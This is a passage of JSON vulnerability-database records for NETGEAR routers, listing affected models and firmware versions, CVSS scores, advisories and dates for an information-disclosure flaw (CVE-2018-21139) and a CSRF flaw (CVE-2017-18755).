"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "jwnr2010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r7300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.24"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.102"
},
{
"model": "wnr2020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wn3000rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.30"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r6020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.38"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.60"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.24"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.34"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.24"
},
{
"model": "r6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.24"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.68"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.1.00.30"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.68"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "v2 1.0.0.51"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.42"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d1500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
}
]
},
"cve": "CVE-2018-21139",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-21139",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016413",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-21139",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-21139",
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2018-016413",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21139",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21139",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2018-016413",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2031",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2031"
},
{
"db": "NVD",
"id": "CVE-2018-21139"
},
{
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained.",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
}
],
"trust": 0.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21139",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016413",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2031",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2031"
},
{
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"id": "VAR-202004-1575",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.40138965763157897
},
"last_update_date": "2024-11-23T23:04:24.898000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Sensitive Information Disclosure on Some Routers, Wireless Extenders and Smart Cradles, PSV-2017-2198",
"trust": 0.8,
"url": "https://kb.netgear.com/000060220/Security-Advisory-for-Sensitive-Information-Disclosure-on-Some-Routers-and-Smart-Cradles-PSV-2017-2198"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116786"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2031"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://kb.netgear.com/000060220/security-advisory-for-sensitive-information-disclosure-on-some-routers-and-smart-cradles-psv-2017-2198"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21139"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21139"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2031"
},
{
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2031"
},
{
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2031"
},
{
"date": "2020-04-23T21:15:11.690000",
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016413"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2031"
},
{
"date": "2024-11-21T04:02:59.713000",
"db": "NVD",
"id": "CVE-2018-21139"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2031"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Information leakage vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016413"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2031"
}
],
"trust": 0.6
}
}
var-202004-1358
Vulnerability from variot
Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.4.8, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000P before 1.0.0.86, R6900P before 1.0.0.56, R7300 before 1.0.0.54, R8300 before 1.0.2.106, R8500 before 1.0.2.106, DGN2200v4 before 1.0.0.86, DGND2200Bv4 before 1.0.0.86, R6050 before 1.0.0.86, JR6150 before 1.0.1.10, R6220 before 1.1.0.50, and WNDR3700v5 before V1.1.0.48. plural NETGEAR A cross-site request forgery vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6700, etc. are all wireless routers from NETGEAR. Attackers can use this vulnerability to read arbitrary files
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1358",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "r7300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r7300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8500",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6700",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7000",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7900",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8000",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.3.24"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
}
]
},
"cve": "CVE-2017-18755",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-18755",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014922",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2021-57165",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18755",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18755",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014922",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18755",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18755",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014922",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-57165",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1928",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1928"
},
{
"db": "NVD",
"id": "CVE-2017-18755"
},
{
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
